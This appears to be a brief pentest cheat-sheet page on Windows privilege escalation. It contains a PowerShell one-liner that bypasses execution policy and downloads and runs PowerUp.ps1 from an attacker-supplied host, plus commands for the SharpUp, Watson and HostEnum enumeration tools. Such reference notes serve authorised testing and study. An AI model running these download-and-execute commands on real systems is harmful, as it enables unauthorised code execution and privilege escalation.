Privilege escalation

Index

Quick Win

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://<ip>/PowerUp.ps1'); Invoke-AllChecks | Out-File -Encoding ASCII checks.txt"
SharpUp.exe

Watson.exe
. .\HostEnum.ps1
Invoke-HostEnum -Local -Privesc -HTMLReport

Enumeration

https://cs.piosky.fr/enumeration/windows/